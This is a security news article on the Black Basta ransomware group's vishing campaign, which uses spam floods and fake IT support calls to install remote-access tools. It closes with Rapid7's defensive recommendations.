Black Basta Ransomware Group Adopts New Vishing Strategy, Targeting Over 500 Organizations

May 13, 2024

Black Basta, a notorious ransomware group, has reportedly adopted a new vishing (voice phishing) technique to trick its victims. This innovative approach involves inundating victims with spam emails and then offering assistance through fake customer service representatives, thereby tricking them into downloading malware. This news emerges in the context of a joint cybersecurity advisory issued by the FBI, Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC), underlining Black Basta's extensive attacks on critical infrastructure.

The ransomware-as-a-service (RaaS) operation, according to the government, typically employs spearphishing and software vulnerabilities to gain initial access into sensitive and high-value organizations. However, a shift in tactics has been observed by researchers from Rapid7, who noticed the group resorting to spam emails followed by fraudulent assistance calls, marking a departure from their usual targeted breaches. The victims of these attacks span various industries, including manufacturing, construction, food and beverage, and transportation. Robert Knapp, senior manager of incident response services at Rapid7, noted that these attacks seem to be more opportunistic than targeted.

Since its discovery in April 2022, Black Basta has compromised a wide range of organizations, including 12 of the 16 US-defined critical infrastructure sectors. Affiliates have reportedly attacked over 500 organizations globally, predominantly in the US, Europe, and Australia. The group's primary method of gaining initial access into systems has been spearphishing. However, since February, affiliates have also been exploiting the critical-rated ConnectWise ScreenConnect bug CVE-2024-1709.

The latest campaign, observed since April, begins with a wave of emails, enough to overwhelm basic spam protections. The attackers then start making calls, posing as members of the targets' IT staff, and trick victims into downloading a remote support tool, either the AnyDesk remote monitoring and management (RMM) platform, or Windows' native Quick Assist utility. Once access is granted, the attacker runs a series of batch scripts disguised as software updates. These scripts establish a connection with the attacker's command-and-control (C2) infrastructure, download a ZIP archive housing OpenSSH, and create run key entries in the Windows registry to establish a reverse shell.

While some credential harvesting has been observed, there have been no instances of mass data exfiltration or extortion yet. Rapid7 advises organizations to review their RMM solutions and use 'allowlisting' tools like AppLocker or Microsoft Defender Application Control to block any others they don't use. They also recommend blocking domains associated with disallowed RMMs and monitoring for the installation and execution of AnyDesk. If blocking is not possible, diligent monitoring and response procedures are recommended.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.